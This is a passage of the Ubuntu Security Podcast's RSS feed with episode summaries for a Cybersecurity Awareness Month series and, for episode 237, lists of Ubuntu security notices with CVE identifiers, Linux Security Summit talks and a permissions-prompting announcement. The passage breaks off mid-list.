        <description>  For the third and final part in our series for Cybersecurity Awareness Month,
  Alex is again joined by Luci as well as Diogo Sousa to discuss future trends in
  cybersecurity and the likely threats of the future.
  </description>
        <googleplay:description>  For the third and final part in our series for Cybersecurity Awareness Month,
  Alex is again joined by Luci as well as Diogo Sousa to discuss future trends in
  cybersecurity and the likely threats of the future.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>For the third and final part in our series for Cybersecurity Awareness Month,
Alex is again joined by Luci as well as Diogo Sousa to discuss future trends in
cybersecurity and the likely threats of the future.</p>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E240.mp3" length="35764205" type="audio/mpeg" /><itunes:duration>2182</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 239
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-239/</link>
          <pubDate>Fri, 18 Oct 2024 16:36:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>11478a6a3b71051bf48ad3fbf86ff74dc2af44ddc341dc66b2a7bdb12a93545ff118fcb8ec0458b3cb8c2b1bfbae414b16a4fe89a92b812dfb1f0c04a49c671f</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 239</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          In the second part of our series for Cybersecurity Awareness Month, Luci is back
  with Alex, along with Eduardo Barretto to discuss our top cybersecurity best
  practices.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  In the second part of our series for Cybersecurity Awareness Month, Luci is back
  with Alex, along with Eduardo Barretto to discuss our top cybersecurity best
  practices.
  </itunes:summary>
        <description>  In the second part of our series for Cybersecurity Awareness Month, Luci is back
  with Alex, along with Eduardo Barretto to discuss our top cybersecurity best
  practices.
  </description>
        <googleplay:description>  In the second part of our series for Cybersecurity Awareness Month, Luci is back
  with Alex, along with Eduardo Barretto to discuss our top cybersecurity best
  practices.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>In the second part of our series for Cybersecurity Awareness Month, Luci is back
with Alex, along with Eduardo Barretto to discuss our top cybersecurity best
practices.</p>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E239.mp3" length="41784660" type="audio/mpeg" /><itunes:duration>2356</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 238
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-238/</link>
          <pubDate>Fri, 04 Oct 2024 13:34:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>c51556342c67c3730c40ef7eb0755b02ca70b54e2b16416478897f0ee6a83bbd4601e58d51a2406043e94189b5a167937ed5fd28f7577291dcb07ed08a23f441</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 238</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          For the first in a 3-part series for Cybersecurity Awareness month, Luci
  Stanescu joins Alex to discuss the recent CUPS vulnerabilities as well as the
  evolution of cybersecurity since the origin of the internet.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  For the first in a 3-part series for Cybersecurity Awareness month, Luci
  Stanescu joins Alex to discuss the recent CUPS vulnerabilities as well as the
  evolution of cybersecurity since the origin of the internet.
  </itunes:summary>
        <description>  For the first in a 3-part series for Cybersecurity Awareness month, Luci
  Stanescu joins Alex to discuss the recent CUPS vulnerabilities as well as the
  evolution of cybersecurity since the origin of the internet.
  </description>
        <googleplay:description>  For the first in a 3-part series for Cybersecurity Awareness month, Luci
  Stanescu joins Alex to discuss the recent CUPS vulnerabilities as well as the
  evolution of cybersecurity since the origin of the internet.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>For the first in a 3-part series for Cybersecurity Awareness month, Luci
Stanescu joins Alex to discuss the recent CUPS vulnerabilities as well as the
evolution of cybersecurity since the origin of the internet.</p>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E238.mp3" length="31115988" type="audio/mpeg" /><itunes:duration>1899</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 237
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-237/</link>
          <pubDate>Fri, 20 Sep 2024 11:57:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>b8a7f759543db68aa6ff041962efbead323957ed57ee414527693528c7b8090dc64d18bfde1e13c82ee7456f77f5104e226bf3117158f6e2a0ec96de75997505</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 237</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          John and Maximé have been talking about Ubuntu's AppArmor user namespace
  restrictions at the the Linux Security Summit in Europe this past week, plus we
  cover some more details from the official announcement of permission prompting
  in...
        
        ]]></itunes:subtitle>
        <itunes:summary>  John and Maximé have been talking about Ubuntu's AppArmor user namespace
  restrictions at the the Linux Security Summit in Europe this past week, plus we
  cover some more details from the official announcement of permission prompting
  in Ubuntu 24.10, a new release of Intel TDX for Ubuntu 24.04 LTS and more.
  </itunes:summary>
        <description>  John and Maximé have been talking about Ubuntu's AppArmor user namespace
  restrictions at the the Linux Security Summit in Europe this past week, plus we
  cover some more details from the official announcement of permission prompting
  in Ubuntu 24.10, a new release of Intel TDX for Ubuntu 24.04 LTS and more.
  </description>
        <googleplay:description>  John and Maximé have been talking about Ubuntu's AppArmor user namespace
  restrictions at the the Linux Security Summit in Europe this past week, plus we
  cover some more details from the official announcement of permission prompting
  in Ubuntu 24.10, a new release of Intel TDX for Ubuntu 24.04 LTS and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>John and Maximé have been talking about Ubuntu&rsquo;s AppArmor user namespace
restrictions at the the Linux Security Summit in Europe this past week, plus we
cover some more details from the official announcement of permission prompting
in Ubuntu 24.10, a new release of Intel TDX for Ubuntu 24.04 LTS and more.</p>
<h2 id="this-week-in-ubuntu-security-updates--01-11">This week in Ubuntu Security Updates (01:11)</h2>
<p>613 unique CVEs addressed in the past fortnight</p>
<h3 id="usn-6989-1-openstack-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6989-1">USN-6989-1</a>] OpenStack vulnerability</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-44082">CVE-2024-44082</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6990-1-znc-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6990-1">USN-6990-1</a>] znc vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-39844">CVE-2024-39844</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6992-1-firefox-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6992-1">USN-6992-1</a>] Firefox vulnerabilities</h3>
<ul>
<li>8 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-8385">CVE-2024-8385</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-8384">CVE-2024-8384</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-8381">CVE-2024-8381</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-8389">CVE-2024-8389</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-8387">CVE-2024-8387</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-8386">CVE-2024-8386</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-8383">CVE-2024-8383</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-8382">CVE-2024-8382</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6993-1-vim-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6993-1">USN-6993-1</a>] Vim vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-43374">CVE-2024-43374</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-41957">CVE-2024-41957</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6991-1-aiohttp-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6991-1">USN-6991-1</a>] AIOHTTP vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-23334">CVE-2024-23334</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6995-1-thunderbird-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6995-1">USN-6995-1</a>] Thunderbird vulnerabilities</h3>
<ul>
<li>10 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-8384">CVE-2024-8384</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-8381">CVE-2024-8381</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-7525">CVE-2024-7525</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-7522">CVE-2024-7522</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-7519">CVE-2024-7519</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-8382">CVE-2024-8382</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-7529">CVE-2024-7529</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-7527">CVE-2024-7527</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-7526">CVE-2024-7526</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-7521">CVE-2024-7521</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6996-1-webkitgtk-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6996-1">USN-6996-1</a>] WebKitGTK vulnerabilities</h3>
<ul>
<li>6 CVEs addressed in Jammy (22.04 LTS), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-4558">CVE-2024-4558</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-40789">CVE-2024-40789</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-40782">CVE-2024-40782</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-40780">CVE-2024-40780</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-40779">CVE-2024-40779</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-40776">CVE-2024-40776</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6841-2-php-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6841-2">USN-6841-2</a>] PHP vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-5458">CVE-2024-5458</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6997-1-usn-6997-2-libtiff-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6997-1">USN-6997-1</a>, <a href="https://ubuntu.com/security/notices/USN-6997-2">USN-6997-2</a>] LibTIFF vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-7006">CVE-2024-7006</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6994-1-netty-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6994-1">USN-6994-1</a>] Netty vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-44487">CVE-2023-44487</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-34462">CVE-2023-34462</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>HTTP/2 DoS, seen exploited in the wild and listen on the CISA KEV</li>
</ul>
<h3 id="usn-6998-1-unbound-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6998-1">USN-6998-1</a>] Unbound vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-43168">CVE-2024-43168</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-43167">CVE-2024-43167</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6999-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6999-1">USN-6999-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>220 CVEs addressed in Noble (24.04 LTS)</li>
<li>Full CVE list elided - see USN for details</li>
</ul>
<h3 id="usn-7003-1-usn-7003-2-usn-7003-3-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-7003-1">USN-7003-1</a>, <a href="https://ubuntu.com/security/notices/USN-7003-2">USN-7003-2</a>, <a href="https://ubuntu.com/security/notices/USN-7003-3">USN-7003-3</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>85 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS)</li>
<li>Full CVE list elided - see USN for details</li>
</ul>
<h3 id="usn-7004-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-7004-1">USN-7004-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>221 CVEs addressed in Noble (24.04 LTS)</li>
<li>Full CVE list elided - see USN for details</li>
</ul>
<h3 id="usn-7005-1-usn-7005-2-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-7005-1">USN-7005-1</a>, <a href="https://ubuntu.com/security/notices/USN-7005-2">USN-7005-2</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>219 CVEs addressed in Jammy (22.04 LTS), Noble (24.04 LTS)</li>
<li>Full CVE list elided - see USN for details</li>
</ul>
<h3 id="usn-7006-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-7006-1">USN-7006-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>94 CVEs addressed in Focal (20.04 LTS)</li>
<li>Full CVE list elided - see USN for details</li>
</ul>
<h3 id="usn-7007-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-7007-1">USN-7007-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>219 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)</li>
<li>Full CVE list elided - see USN for details</li>
</ul>
<h3 id="usn-7008-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-7008-1">USN-7008-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>222 CVEs addressed in Jammy (22.04 LTS)</li>
<li>Full CVE list elided - see USN for details</li>
</ul>
<h3 id="usn-7009-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-7009-1">USN-7009-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>219 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)</li>
<li>Full CVE list elided - see USN for details</li>
</ul>
<h3 id="usn-7019-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-7019-1">USN-7019-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>429 CVEs addressed in Jammy (22.04 LTS)</li>
<li>Full CVE list elided - see USN for details</li>
</ul>
<h3 id="usn-7002-1-setuptools-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-7002-1">USN-7002-1</a>] Setuptools vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-6345">CVE-2024-6345</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-7000-1-usn-7000-2-expat-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-7000-1">USN-7000-1</a>, <a href="https://ubuntu.com/security/notices/USN-7000-2">USN-7000-2</a>] Expat vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-45492">CVE-2024-45492</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-45491">CVE-2024-45491</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-45490">CVE-2024-45490</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-7001-1-usn-7001-2-xmltok-library-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-7001-1">USN-7001-1</a>, <a href="https://ubuntu.com/security/notices/USN-7001-2">USN-7001-2</a>] xmltok library vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-45491">CVE-2024-45491</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-45490">CVE-2024-45490</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6560-3-openssh-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6560-3">USN-6560-3</a>] OpenSSH vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-51385">CVE-2023-51385</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-7011-1-usn-7011-2-clamav-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-7011-1">USN-7011-1</a>, <a href="https://ubuntu.com/security/notices/USN-7011-2">USN-7011-2</a>] ClamAV vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-20506">CVE-2024-20506</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-20505">CVE-2024-20505</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-7012-1-curl-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-7012-1">USN-7012-1</a>] curl vulnerability</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-8096">CVE-2024-8096</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-7013-1-dovecot-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-7013-1">USN-7013-1</a>] Dovecot vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-23185">CVE-2024-23185</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-23184">CVE-2024-23184</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-7014-1-nginx-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-7014-1">USN-7014-1</a>] nginx vulnerability</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-7347">CVE-2024-7347</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-7015-1-python-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-7015-1">USN-7015-1</a>] Python vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-8088">CVE-2024-8088</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-7592">CVE-2024-7592</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-6923">CVE-2024-6923</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-6232">CVE-2024-6232</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-27043">CVE-2023-27043</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-7010-1-dcmtk-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-7010-1">USN-7010-1</a>] DCMTK vulnerabilities</h3>
<ul>
<li>9 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-34509">CVE-2024-34509</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-34508">CVE-2024-34508</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-28130">CVE-2024-28130</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-43272">CVE-2022-43272</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2121">CVE-2022-2121</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-41690">CVE-2021-41690</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-41689">CVE-2021-41689</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-41688">CVE-2021-41688</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-41687">CVE-2021-41687</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-7016-1-frr-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-7016-1">USN-7016-1</a>] FRR vulnerability</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS), Noble (24.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-44070">CVE-2024-44070</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-7017-1-quagga-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-7017-1">USN-7017-1</a>] Quagga vulnerability</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-44070">CVE-2024-44070</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-7018-1-openssl-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-7018-1">USN-7018-1</a>] OpenSSL vulnerabilities</h3>
<ul>
<li>6 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-0727">CVE-2024-0727</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3446">CVE-2023-3446</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2068">CVE-2022-2068</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1292">CVE-2022-1292</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23840">CVE-2021-23840</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-1968">CVE-2020-1968</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="linux-security-summit-europe-2024--03-44">Linux Security Summit Europe 2024 (03:44)</h3>
<ul>
<li><a href="https://events.linuxfoundation.org/linux-security-summit-europe/program/schedule/">https://events.linuxfoundation.org/linux-security-summit-europe/program/schedule/</a></li>
<li>Sep 16-17 - Vienna, Austria</li>
<li>John Johansen and Maxime Bélair from AppArmor team presented &ldquo;Restricting
Unprivileged User Namespaces in Ubuntu&rdquo;
<ul>
<li><a href="https://youtu.be/yCHGmdXpylA?t=1053">https://youtu.be/yCHGmdXpylA?t=1053</a></li>
<li><a href="https://static.sched.com/hosted_files/lsseu2024/ed/Restricting%20Unprivileged%20User%20Namespaces%20In%20Ubuntu.pdf">https://static.sched.com/hosted_files/lsseu2024/ed/Restricting%20Unprivileged%20User%20Namespaces%20In%20Ubuntu.pdf</a></li>
</ul>
</li>
<li>Other talks
<ul>
<li>Deep-dive into xz-utils supply chain attack</li>
<li>Internals of the SLUB memory allocator for exploit developers</li>
<li>Landlock update - including details of new IOCTL restrictions etc</li>
<li>systemd and TPM2 update</li>
</ul>
</li>
</ul>
<h3 id="official-announcement-of-permissions-prompting-in-ubuntu-24-dot-10--09-00">Official announcement of Permissions Prompting in Ubuntu 24.10 (09:00)</h3>
<ul>
<li><a href="https://discourse.ubuntu.com/t/ubuntu-desktop-s-24-10-dev-cycle-part-5-introducing-permissions-prompting/47963">https://discourse.ubuntu.com/t/ubuntu-desktop-s-24-10-dev-cycle-part-5-introducing-permissions-prompting/47963</a></li>
<li><a href="/episode-236/#ubuntu-security-center-with-snapd-based-apparmor-home-file-access-prompting-preview--05-45">Ubuntu Security Center with snapd-based AppArmor home file access prompting preview in episode 236</a></li>
<li>Even works for command-line applications etc - not just graphical</li>
<li>Covers future developments as well:
<ul>
<li>Better default response suggestions based on user feedback.</li>
<li>Shell integration of the prompting pop-ups (eg full screen takeovers)</li>
